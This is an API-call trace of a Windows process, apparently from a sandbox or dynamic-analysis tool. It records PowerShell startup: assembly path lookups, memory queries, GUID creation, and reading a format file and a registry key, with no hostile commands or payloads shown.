	[0277.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0277.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0277.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0277.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0277.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0277.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0277.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0277.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0277.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0277.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0277.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0277.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0277.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0277.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0277.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0277.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.509] VirtualQuery (in: lpAddress=0x12bbc0, lpBuffer=0x12ca80, dwLength=0x30 | out: lpBuffer=0x12ca80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0277.510] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xaea13e6a, Data2=0x5d07, Data3=0x49b6, Data4=([0]=0x8c, [1]=0x68, [2]=0x92, [3]=0x90, [4]=0x1b, [5]=0x4c, [6]=0xa, [7]=0x70))) returned 0x0
	[0277.511] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x7431d4bd, Data2=0x780b, Data3=0x4030, Data4=([0]=0xa1, [1]=0x68, [2]=0xe7, [3]=0xcb, [4]=0x51, [5]=0x8c, [6]=0xd0, [7]=0x5f))) returned 0x0
	[0277.934] VirtualQuery (in: lpAddress=0x12bd70, lpBuffer=0x12cc30, dwLength=0x30 | out: lpBuffer=0x12cc30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0277.934] VirtualQuery (in: lpAddress=0x12bd70, lpBuffer=0x12cc30, dwLength=0x30 | out: lpBuffer=0x12cc30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0277.936] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x4db502d, Data2=0xcfec, Data3=0x4895, Data4=([0]=0xba, [1]=0x81, [2]=0x59, [3]=0xd6, [4]=0xfa, [5]=0x63, [6]=0x68, [7]=0x75))) returned 0x0
	[0277.939] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x439ab161, Data2=0xe34f, Data3=0x49ff, Data4=([0]=0xba, [1]=0x5d, [2]=0x31, [3]=0x70, [4]=0x8, [5]=0x3a, [6]=0xcf, [7]=0x20))) returned 0x0
	[0277.939] VirtualQuery (in: lpAddress=0x12bfc0, lpBuffer=0x12ce80, dwLength=0x30 | out: lpBuffer=0x12ce80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0277.939] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0277.939] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0277.940] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x65d3bea9, Data2=0x980f, Data3=0x413e, Data4=([0]=0x81, [1]=0x62, [2]=0x12, [3]=0x36, [4]=0xea, [5]=0xd7, [6]=0x69, [7]=0xad))) returned 0x0
	[0277.940] VirtualQuery (in: lpAddress=0x12bfc0, lpBuffer=0x12ce80, dwLength=0x30 | out: lpBuffer=0x12ce80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0277.940] VirtualQuery (in: lpAddress=0x12bde0, lpBuffer=0x12cca0, dwLength=0x30 | out: lpBuffer=0x12cca0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0277.940] VirtualQuery (in: lpAddress=0x12b630, lpBuffer=0x12c4f0, dwLength=0x30 | out: lpBuffer=0x12c4f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0277.940] VirtualQuery (in: lpAddress=0x12b630, lpBuffer=0x12c4f0, dwLength=0x30 | out: lpBuffer=0x12c4f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0277.941] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x2a1cd8c9, Data2=0x5529, Data3=0x4ca6, Data4=([0]=0xb9, [1]=0x47, [2]=0x8, [3]=0x92, [4]=0x59, [5]=0x80, [6]=0xfb, [7]=0x78))) returned 0x0
	[0277.941] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x23581413, Data2=0xdc7c, Data3=0x45a2, Data4=([0]=0x8d, [1]=0x74, [2]=0x30, [3]=0x20, [4]=0xa, [5]=0xf7, [6]=0xd9, [7]=0xec))) returned 0x0
	[0277.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0277.941] SetErrorMode (uMode=0x1) returned 0x1
	[0277.941] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0277.942] GetFileType (hFile=0x304) returned 0x1
	[0277.942] SetErrorMode (uMode=0x1) returned 0x1
	[0277.942] GetFileType (hFile=0x304) returned 0x1
	[0277.942] ReadFile (in: hFile=0x304, lpBuffer=0x3486138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3486138*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0277.943] ReadFile (in: hFile=0x304, lpBuffer=0x3486138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3486138*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0277.943] ReadFile (in: hFile=0x304, lpBuffer=0x3486138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3486138*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0277.944] ReadFile (in: hFile=0x304, lpBuffer=0x3486138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3486138*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0277.944] ReadFile (in: hFile=0x304, lpBuffer=0x3486138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3486138*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0277.944] ReadFile (in: hFile=0x304, lpBuffer=0x3486138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3486138*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0277.945] ReadFile (in: hFile=0x304, lpBuffer=0x3486138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3486138*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0277.945] ReadFile (in: hFile=0x304, lpBuffer=0x3486138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3486138*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0277.945] ReadFile (in: hFile=0x304, lpBuffer=0x3486138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3486138*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0277.946] ReadFile (in: hFile=0x304, lpBuffer=0x3486138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3486138*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0277.946] ReadFile (in: hFile=0x304, lpBuffer=0x3486138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3486138*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0277.946] ReadFile (in: hFile=0x304, lpBuffer=0x3486138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3486138*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0277.946] ReadFile (in: hFile=0x304, lpBuffer=0x3486138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3486138*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0277.947] ReadFile (in: hFile=0x304, lpBuffer=0x3486138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3486138*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0277.947] ReadFile (in: hFile=0x304, lpBuffer=0x3486138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3486138*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0277.947] ReadFile (in: hFile=0x304, lpBuffer=0x3486138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3486138*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0277.948] ReadFile (in: hFile=0x304, lpBuffer=0x3486138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3486138*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0277.948] ReadFile (in: hFile=0x304, lpBuffer=0x3486138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3486138*, lpNumberOfBytesRead=0x12d098*=0xbce, lpOverlapped=0x0) returned 1
	[0277.949] ReadFile (in: hFile=0x304, lpBuffer=0x348586e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x348586e*, lpNumberOfBytesRead=0x12d098*=0x0, lpOverlapped=0x0) returned 1
	[0277.949] ReadFile (in: hFile=0x304, lpBuffer=0x3486138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3486138*, lpNumberOfBytesRead=0x12d098*=0x0, lpOverlapped=0x0) returned 1
	[0277.949] CloseHandle (hObject=0x304) returned 1
	[0277.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0277.949] SetErrorMode (uMode=0x1) returned 0x1
	[0277.949] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d040 | out: lpFileInformation=0x12d040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0277.949] SetErrorMode (uMode=0x1) returned 0x1
	[0277.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0277.950] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d128 | out: phkResult=0x12d128*=0x304) returned 0x0
	[0277.950] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d0ac, lpData=0x0, lpcbData=0x12d0a8*=0x0 | out: lpType=0x12d0ac*=0x1, lpData=0x0, lpcbData=0x12d0a8*=0x56) returned 0x0
	[0277.950] CoTaskMemAlloc (cb=0x5a) returned 0x1b8a6d80
	[0277.950] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d07c, lpData=0x1b8a6d80, lpcbData=0x12d078*=0x56 | out: lpType=0x12d07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d078*=0x56) returned 0x0
	[0277.950] CoTaskMemFree (pv=0x1b8a6d80) 
	[0277.950] RegCloseKey (hKey=0x304) returned 0x0
	[0277.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0277.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0282.268] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x6689d9b, Data2=0xd7ce, Data3=0x42af, Data4=([0]=0xa5, [1]=0xf7, [2]=0xc9, [3]=0x21, [4]=0x75, [5]=0xc6, [6]=0x23, [7]=0x7))) returned 0x0
	[0282.269] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xea39498d, Data2=0xfb11, Data3=0x4fdc, Data4=([0]=0xbb, [1]=0x65, [2]=0x37, [3]=0xba, [4]=0x16, [5]=0xef, [6]=0x43, [7]=0xfe))) returned 0x0
	[0283.191] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x43a9f481, Data2=0x75c2, Data3=0x438b, Data4=([0]=0x92, [1]=0xb0, [2]=0x2, [3]=0xa2, [4]=0x11, [5]=0x6a, [6]=0xc2, [7]=0xb8))) returned 0x0
	[0283.192] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x22e80a3, Data2=0x2892, Data3=0x4f30, Data4=([0]=0x96, [1]=0x5e, [2]=0xeb, [3]=0xd1, [4]=0x78, [5]=0x6, [6]=0xff, [7]=0x81))) returned 0x0
	[0283.192] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x7d41292e, Data2=0xdc10, Data3=0x4532, Data4=([0]=0xa4, [1]=0xb2, [2]=0xa2, [3]=0xc9, [4]=0xac, [5]=0xbe, [6]=0x67, [7]=0x87))) returned 0x0
	[0283.193] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x9268948b, Data2=0xd70c, Data3=0x4acb, Data4=([0]=0x94, [1]=0x2a, [2]=0x4c, [3]=0xbd, [4]=0x2a, [5]=0xb8, [6]=0xc3, [7]=0x3c))) returned 0x0
	[0283.193] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.194] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x4be19b8c, Data2=0xf046, Data3=0x476c, Data4=([0]=0x9c, [1]=0x79, [2]=0xf3, [3]=0x34, [4]=0x6f, [5]=0x9e, [6]=0x4f, [7]=0xd7))) returned 0x0
	[0283.195] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.196] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.197] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x8a8c94b5, Data2=0x2dbc, Data3=0x4410, Data4=([0]=0xbe, [1]=0xe6, [2]=0x14, [3]=0x8, [4]=0x24, [5]=0x44, [6]=0x68, [7]=0xd7))) returned 0x0
	[0283.197] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x1b6de9b9, Data2=0x8c32, Data3=0x4fc3, Data4=([0]=0x8a, [1]=0x17, [2]=0xc1, [3]=0x21, [4]=0x2, [5]=0xeb, [6]=0xa2, [7]=0x29))) returned 0x0
	[0283.198] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x4a5a6eb5, Data2=0xfbff, Data3=0x4faf, Data4=([0]=0x97, [1]=0x36, [2]=0x40, [3]=0x21, [4]=0x47, [5]=0xfd, [6]=0xe, [7]=0x59))) returned 0x0
	[0283.198] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xb128fe18, Data2=0xd8d2, Data3=0x4876, Data4=([0]=0xbe, [1]=0x44, [2]=0xf4, [3]=0x91, [4]=0xfb, [5]=0xd8, [6]=0x46, [7]=0x30))) returned 0x0
